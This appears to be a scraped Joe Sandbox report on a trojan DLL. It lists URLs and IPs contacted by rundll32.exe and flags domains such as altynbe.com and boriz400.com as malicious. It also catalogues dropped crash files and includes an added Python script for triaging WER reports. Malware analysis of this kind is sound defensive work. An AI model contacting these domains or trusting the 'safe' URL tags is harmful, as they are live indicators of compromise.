                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpMfErundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://altynbe.com/5~rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://boriz400.com/rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://api.msn.com/qexplorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepjBrundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://altynbe.com/api/azureurerundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://altynbe.com/=~rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/nrundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php4rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep&jrundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://altynbe.com/api/azureprundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://upx.sf.netAmcache.hve.9.drfalse
                                                                                                              high
Legend (share of contacted IPs per country):
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
95.164.68.73 | anikvan.com | Gibraltar | 29632 | NASSIST-ASGI | true
138.124.183.215 | altynbe.com | Norway | 8983 | NOKIA-ASFI | true
104.21.16.155 | workspacin.cloud | United States | 13335 | CLOUDFLARENETUS | true
3.69.236.35 | ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com | United States | 16509 | AMAZON-02US | false
91.194.11.183 | boriz400.com | Russian Federation | 42994 | HQservCommunicationSolutionsIL | true
54.175.181.104 | ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
                                                                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                                                                              Analysis ID:1439879
                                                                                                              Start date and time:2024-05-11 00:03:08 +02:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 7m 12s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:light
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:28
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:1
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:upfilles.dll.dll
                                                                                                              (renamed file extension from exe to dll)
                                                                                                              Original Sample Name:upfilles.dll.exe
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.evad.winDLL@32/17@8/6
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              • Number of executed functions: 0
                                                                                                              • Number of non-executed functions: 0
                                                                                                              • Excluded processes from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                              • TCP Packets have been reduced to 100
                                                                                                              • Excluded IPs from analysis (whitelisted): 52.168.117.173, 20.189.173.20
                                                                                                              • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              • Not all processes were analyzed; report is missing behavior information
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • VT rate limit hit for: upfilles.dll.dll
                                                                                                              Time      Type             Description
                                                                                                              00:04:08  API Interceptor  1500037x Sleep call for process: rundll32.exe modified
                                                                                                              00:04:08  API Interceptor  1x Sleep call for process: loaddll64.exe modified
                                                                                                              00:04:11  API Interceptor  4x Sleep call for process: WerFault.exe modified
                                                                                                              00:04:51  API Interceptor  2619129x Sleep call for process: explorer.exe modified
                                                                                                              No context
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):65536
                                                                                                              Entropy (8bit):0.7695669651831538
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:0SFi/iSyKyosj+4RvNxrfNrQXIDcQOc6ncECcw3l+XaXz+HbHgSQgJjZh88Wpoxf:3ciSyoA80wjIx8jbyzuiFeZ24lO83l
                                                                                                              MD5:F38F1F5A2799280E9AE9ECAED3D4D7F2
                                                                                                              SHA1:614B13F3576A06B0A5D66A28720AD52CD48F64F1
                                                                                                              SHA-256:73EACA5144E5222EA3859908633BE224CDF2CD699D28056A5D123197108AFA1D
                                                                                                              SHA-512:B9504BAE2E55AB063A7D732A66DBD0739F937C3A3F9B1ED05B2C9E54966B1D4A4FF1AF7BF0FA1B5BC023C7BFA404DDCCC9217463CBFCCB67275A9DBB3F848250
                                                                                                              Malicious:false
                                                                                                              Preview (decoded from UTF-16LE, BOM and CRLF removed):
                                                                                                                Version=1
                                                                                                                EventType=APPCRASH
                                                                                                                EventTime=133598522487572158
                                                                                                                ReportType=2
                                                                                                                Consent=1
                                                                                                                UploadTime=133598522491165981
                                                                                                                ReportStatus=524384
                                                                                                                ReportIdentifier=6fb130ca-cac1-4736-bec2-e227247d8b1e
                                                                                                                IntegratorReportIdentifier=7ff0003c-cf1a-4813-90a4-55b68af9f410
                                                                                                                Wow64Host=34404
                                                                                                                NsAppName=rundll32.exe_upfilles.dll.dll
                                                                                                                OriginalFilename=RUNDLL32.EXE
                                                                                                                AppSessionGuid=00001c78-0001-0014-8e21-07fb25a3da01
                                                                                                                TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000dd399ae46303343f9f0da189aee11c67bd86
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):65536
                                                                                                              Entropy (8bit):0.7695284270582192
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:DgFPd/ifyKyOsj+4RvNxrfNrQXIDcQOc6ncECcw3l+XaXz+HbHgSQgJjZh88Wpo3:s11ifyOA80wjIx8jbyzuiFeZ24lO83D
                                                                                                              MD5:2A79D4F0CC409452333A8DDF84450AEF
                                                                                                              SHA1:512CBEAAAC2972AE331C435F33652DABEA99A541
                                                                                                              SHA-256:3B527751CA5679B2B05D430B17ADDE2A98AFCC30216D6AA11E58AFF116A824B0
                                                                                                              SHA-512:9B02987593193A773237874A8B64ED4910787AF41B8B8ABCCC5DBA27DF4A1CFE6DC316B2342075BCB51ADB9B0D7033C8AEE7CBCC8867DFD0860E46D5A3FFF0A6
                                                                                                              Malicious:false
                                                                                                              Preview (decoded from UTF-16LE, BOM and CRLF removed):
                                                                                                                Version=1
                                                                                                                EventType=APPCRASH
                                                                                                                EventTime=133598522452844366
                                                                                                                ReportType=2
                                                                                                                Consent=1
                                                                                                                UploadTime=133598522455969255
                                                                                                                ReportStatus=524384
                                                                                                                ReportIdentifier=d9b8934c-437b-450d-af46-0185962b24b1
                                                                                                                IntegratorReportIdentifier=1a75886c-1e14-4977-a41a-12a64d00c9b7
                                                                                                                Wow64Host=34404
                                                                                                                NsAppName=rundll32.exe_upfilles.dll.dll
                                                                                                                OriginalFilename=RUNDLL32.EXE
                                                                                                                AppSessionGuid=00001974-0001-0014-9113-38f925a3da01
                                                                                                                TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000dd399ae46303343f9f0da189aee11c67bd86
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):65536
                                                                                                              Entropy (8bit):0.7695293488830603
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:CcxgFF3/iOyKyZsj+4RvNxrfKQXIDcQOc6ncETcw3CCXaXz+HbHgSQgJjZh88Wp8:FgviOyZK0wjpFjbyzuiFeZ24lO83
                                                                                                              MD5:02C2AE579A388FFA4C5C6A5104F49832
                                                                                                              SHA1:0C660AE3539AE95EDF65C53088E9DA7EB5DFFEC9
                                                                                                              SHA-256:C313D051688A264AD7778F15CEC6ECB0D2FA908EA92D9134E25ED80B3B43C826
                                                                                                              SHA-512:A0A17281B979ACB45169A5C79673EC67EEC58F73B21E9D325CE34BD1630D7DBF459BF7AA4DCCE803D8D4842130BCD62AEE4F3822E8A75FA2770905BD285D0830
                                                                                                              Malicious:false
                                                                                                              Preview (decoded from UTF-16LE, BOM and CRLF removed):
                                                                                                                Version=1
                                                                                                                EventType=APPCRASH
                                                                                                                EventTime=133598522485597425
                                                                                                                ReportType=2
                                                                                                                Consent=1
                                                                                                                UploadTime=133598522489972439
                                                                                                                ReportStatus=524384
                                                                                                                ReportIdentifier=7dc7f057-dc81-4d91-9caa-bd8701d223a3
                                                                                                                IntegratorReportIdentifier=0b5fa4a6-84c8-412c-b811-e9d87252dc7a
                                                                                                                Wow64Host=34404
                                                                                                                NsAppName=rundll32.exe_upfilles.dll.dll
                                                                                                                OriginalFilename=RUNDLL32.EXE
                                                                                                                AppSessionGuid=00001c68-0001-0014-0417-06fb25a3da01
                                                                                                                TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000dd399ae46303343f9f0da189aee11c67bd86
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):65536
                                                                                                              Entropy (8bit):0.7695999953173611
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:TEF1ks0/idyKygsj+4RvNxrfKQXIDcQOc6ncETcw3CCXaXz+HbHgSQgJjZh88Wp8:o3CidygK0wjpFjbyzuiFeZ24lO83
                                                                                                              MD5:F9DA4317B3745718F8A31BB61F06A4F4
                                                                                                              SHA1:9BD89B72FF6CD9493B7343C4A720B403B54D0439
                                                                                                              SHA-256:072151E64254174294A716437E4F986EC8336BAC545EBEA5D71EC5A481A00DBD
                                                                                                              SHA-512:D2E3D37FAB0EB27FDEAA9A17C253B5D225EA96CD53D898A9F7A8A829D2D6B887E0139387DF6CDA03D85A7E2E8595025E08032A65822C12B65E124144B35837AC
                                                                                                              Malicious:false
                                                                                                              Preview (decoded from UTF-16LE, BOM and CRLF removed):
                                                                                                                Version=1
                                                                                                                EventType=APPCRASH
                                                                                                                EventTime=133598522423779682
                                                                                                                ReportType=2
                                                                                                                Consent=1
                                                                                                                UploadTime=133598522427373435
                                                                                                                ReportStatus=524384
                                                                                                                ReportIdentifier=8641b0ad-46f6-452c-a496-10d58d4ec871
                                                                                                                IntegratorReportIdentifier=ea02eb5a-08a0-4c31-b139-448174298eaa
                                                                                                                Wow64Host=34404
                                                                                                                NsAppName=rundll32.exe_upfilles.dll.dll
                                                                                                                OriginalFilename=RUNDLL32.EXE
                                                                                                                AppSessionGuid=000018b4-0001-0014-0df7-6bf725a3da01
                                                                                                                TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000dd399ae46303343f9f0da189aee11c67bd86
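The four Report.wer files above are the Windows Error Reporting records WerFault.exe wrote each time rundll32.exe crashed while hosting the sample (NsAppName=rundll32.exe_upfilles.dll.dll). The Python below is an added example, not part of the Joe Sandbox report or its tooling: it decodes a Report.wer blob in the form the previews show (UTF-16LE with BOM, CRLF-terminated key=value lines), converts the FILETIME EventTime to UTC, and splits NsAppName into host executable and hosted module. The sample blob is constructed from the first record above; the set of host binaries treated as worth a second look, and the split of NsAppName on its first underscore, are this example's own assumptions.

```python
"""Triage of Windows Error Reporting (Report.wer) files like the ones
WerFault.exe dropped in this analysis.  Added example, not part of the
Joe Sandbox report; the sample input is constructed from the first
Report.wer preview on the page."""
from datetime import datetime, timedelta, timezone

# Constructed sample: the first Report.wer record above, re-encoded the way
# WerFault.exe writes it (UTF-16LE with BOM, CRLF line endings).
_SAMPLE_TEXT = (
    "Version=1\r\n"
    "EventType=APPCRASH\r\n"
    "EventTime=133598522487572158\r\n"
    "ReportType=2\r\n"
    "Consent=1\r\n"
    "UploadTime=133598522491165981\r\n"
    "ReportStatus=524384\r\n"
    "ReportIdentifier=6fb130ca-cac1-4736-bec2-e227247d8b1e\r\n"
    "Wow64Host=34404\r\n"
    "NsAppName=rundll32.exe_upfilles.dll.dll\r\n"
    "OriginalFilename=RUNDLL32.EXE\r\n"
)
SAMPLE_WER = b"\xff\xfe" + _SAMPLE_TEXT.encode("utf-16-le")

# Assumption of this example: DLL/script hosts whose crash usually means
# foreign code was loaded into them, so the hosted module deserves a look.
HOSTS_OF_INTEREST = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe"}

WINDOWS_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_utc(ft: int) -> datetime:
    """FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware UTC datetime."""
    return WINDOWS_EPOCH + timedelta(microseconds=ft // 10)


def parse_wer(data: bytes) -> dict:
    """Decode a Report.wer blob into a key -> value dict.

    WerFault.exe writes UTF-16 with a BOM; the BOM picks the byte order.
    A BOM-less blob is read as UTF-8 so an odd sample does not raise.
    """
    if data.startswith(b"\xff\xfe"):
        text = data[2:].decode("utf-16-le")
    elif data.startswith(b"\xfe\xff"):
        text = data[2:].decode("utf-16-be")
    else:
        text = data.decode("utf-8", errors="replace")
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep:  # skip blank or malformed lines
            fields[key.strip()] = value.strip()
    return fields


def triage(fields: dict) -> dict:
    """Pull out what a responder wants from one crash record.

    For rundll32 crashes WER names the app "<host>_<module>", as the page's
    NsAppName shows; splitting on the first underscore is this example's
    assumption about that convention.
    """
    host, _, module = fields.get("NsAppName", "").partition("_")
    return {
        "event_time": filetime_to_utc(int(fields["EventTime"])),
        "host": host,
        "module": module,
        "report_id": fields.get("ReportIdentifier", ""),
        "suspicious": host.lower() in HOSTS_OF_INTEREST and module != "",
    }


if __name__ == "__main__":
    for key, value in triage(parse_wer(SAMPLE_WER)).items():
        print(f"{key:12} {value}")
```

On a live host the same parser can be pointed at the Report.wer files under %ProgramData%\Microsoft\Windows\WER\ReportArchive and ReportQueue; a rundll32.exe or regsvr32.exe crash whose hosted module is not a known Windows DLL is a cheap lead, and the decoded EventTime lines the crash up against process-creation and network telemetry (here it matches the minidump timestamps of 22:04 UTC on 10 May 2024).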
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:Mini DuMP crash report, 14 streams, Fri May 10 22:04:02 2024, 0x1205a4 type
                                                                                                              Category:dropped
                                                                                                              Size (bytes):66070
                                                                                                              Entropy (8bit):1.5462375465383378
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:5u8hjNE3e2neSVUa52sl4GbfhHoi7M9UUACGcKutR1ZfE0FXtpqgJbqStCSqjWIF:XhjNi2OM+UAtq1ZfNTqgwStCS9ngz
                                                                                                              MD5:677694119DA44E5FEC7BF1C1317E830B
                                                                                                              SHA1:4FEB41E3E2792D4305F3FD66F5EE17E8BFFDA32D
                                                                                                              SHA-256:13C9DE6CF736408ECF3F5D8B186442A3381B005B307FDBD5DCEB114A627866FB
                                                                                                              SHA-512:000B790E53523A6DFE23A290EFD228BFF0E399927D925B880663ED99F0F3E07957C357E346C4976419B62BC34EC43367BE19E3CA39663B65BD3A6E16CDCE2824
                                                                                                              Malicious:false
                                                                                                              Preview:MDMP..a..... ........>f....................................$...............T.......8...........T.......................................p...............................................................................eJ..............Lw......................T............>f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8534
                                                                                                              Entropy (8bit):3.6939797702013397
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:R6l7wVeJqdgkmE6Yo8N4LgmfWP3pry89bU66Wf088m:R6lXJqakmE6YLegmfWPRU6DfR
                                                                                                              MD5:80B9B0AFA9ABA69B9A78557C448086C5
                                                                                                              SHA1:B99101A8A598F674B85334D5F8A0609AC22631E6
                                                                                                              SHA-256:9968C12422E570B5EE4916B7EDF4BC0240E72DE23F62EF10630EC4B1E51814FF
                                                                                                              SHA-512:8D2CBE94CDDBA9C7F4FDD42B91E690533542BB23B8DD38FD258D3CC44585D6C07E12DA68A06CC179B1B8C7D8C3A8F400316A4787D58FB980DD530F34F2BAB469
                                                                                                              Malicious:false
                                                                                                              Preview (decoded from UTF-16LE, BOM and CRLF removed; preview cuts off mid-element):
                                                                                                                <?xml version="1.0" encoding="UTF-16"?>
                                                                                                                <WERReportMetadata>
                                                                                                                  <OSVersionInformation>
                                                                                                                    <WindowsNTVersion>10.0</WindowsNTVersion>
                                                                                                                    <Build>19045</Build>
                                                                                                                    <Product>(0x30): Windows 10 Pro</Product>
                                                                                                                    <Edition>Professional</Edition>
                                                                                                                    <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
                                                                                                                    <Revision>2006</Revision>
                                                                                                                    <Flavor>Multiprocessor Free</Flavor>
                                                                                                                    <Architecture>X64</Architecture>
                                                                                                                    <LCID>2057</LCID>
                                                                                                                  </OSVersionInformation>
                                                                                                                  <ProcessInformation>
                                                                                                                    <Pid>6324</Pi
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4777
                                                                                                              Entropy (8bit):4.477202967569579
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:cvIwWl8zssJg771I99aWpW8VY+Ym8M4JCNCF0laFtyq85mQCy8ptSTSLd:uIjfqI7+b7VeJilCGT8poOLd
                                                                                                              MD5:5D367A225C41966DC6550185A90DAE6F
                                                                                                              SHA1:101CC4DF6477453EA9552B5AD0EE1273F1599AEA
                                                                                                              SHA-256:E6997AC198F3DBE27F9915E0C4A3CC5E65654C6536885480C9BC6EF40290C190
                                                                                                              SHA-512:EDF7487656C3685EFE40BEAB794203DDBF95DD49E14CA56E27EAC8BD88B5CCE0BFF9C5555D329990288C05738F40CF731B5EE9D15DB3800A90DCA5F80C5D46F8
                                                                                                              Malicious:false
                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="317586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:Mini DuMP crash report, 14 streams, Fri May 10 22:04:05 2024, 0x1205a4 type
                                                                                                              Category:dropped
                                                                                                              Size (bytes):58190
                                                                                                              Entropy (8bit):1.605256614606473
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:0VrYrCpCzQOMAsu+Qiqwxay+QsK0QRAQh:2E1TpoQi1aZQsK/Rp
                                                                                                              MD5:CAAA37C00D8ECF6FA5FC4FA2A30BD2FA
                                                                                                              SHA1:2F9D061ED037ECE51B72AC937A99813073410435
                                                                                                              SHA-256:ECA00EFCB890B105FA3A548999F1E7A161FD7BDB5ED7B1F2FF2240DF570C41E2
                                                                                                              SHA-512:9432BA4BCEB6E8A6D56DB1CBD256C7A1C3835413B22B4CEC7A7D8D7FACC8A85CF7E981CDC802E9A7001EB67285401042ED97471A5617B1D8BC220A145DD928C2
                                                                                                              Malicious:false
                                                                                                              Preview:MDMP..a..... ........>f.........................................)..........T.......8...........T...............V...........T...........@...............................................................................eJ..............Lw......................T.......t....>f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8534
                                                                                                              Entropy (8bit):3.6966319113948383
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:R6l7wVeJRBAmS6YojN4LgmfWfiwsprRC89br4Wf9vZm:R6lXJXAmS6YEegmfWqP7rxfi
                                                                                                              MD5:B607A2EB5584FD30993D12ABB2C4DF8A
                                                                                                              SHA1:F2E1E2CE69FB5F3AB9850FF3A56668B6DFAE0AFF
                                                                                                              SHA-256:DC1BDEED634E5907DFD137282558057ED000A00CD7BABC1ABC665D6B47410064
                                                                                                              SHA-512:249030B4D7B167C51DA04101F483BFE2D977EDE4D0DBAF6E45720002D56785033391999DCBE0591289B8DE51E15D1C1ADBCE641A4472471D0A4B869CED69DDAD
                                                                                                              Malicious:false
                                                                                                              Preview (decoded from UTF-16LE, BOM and CRLF removed; preview cuts off mid-element):
                                                                                                                <?xml version="1.0" encoding="UTF-16"?>
                                                                                                                <WERReportMetadata>
                                                                                                                  <OSVersionInformation>
                                                                                                                    <WindowsNTVersion>10.0</WindowsNTVersion>
                                                                                                                    <Build>19045</Build>
                                                                                                                    <Product>(0x30): Windows 10 Pro</Product>
                                                                                                                    <Edition>Professional</Edition>
                                                                                                                    <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
                                                                                                                    <Revision>2006</Revision>
                                                                                                                    <Flavor>Multiprocessor Free</Flavor>
                                                                                                                    <Architecture>X64</Architecture>
                                                                                                                    <LCID>2057</LCID>
                                                                                                                  </OSVersionInformation>
                                                                                                                  <ProcessInformation>
                                                                                                                    <Pid>6516</Pi
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4777
                                                                                                              Entropy (8bit):4.480227848947886
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:cvIwWl8zssJg771I99aWpW8VYsYm8M4JCNCF0saFmjyq85mQCrAptSTSDd:uIjfqI7+b7VEJi8jGfpoODd
                                                                                                              MD5:76611ED68AE98A3C1C5418DA42AD9839
                                                                                                              SHA1:E56614DC31056975565348CCA2BC464DC61B1657
                                                                                                              SHA-256:1E7C757B8CED61BB0960A6FD8EE447BE3D82DF516B6DBF0CD4E9DD3CD465F897
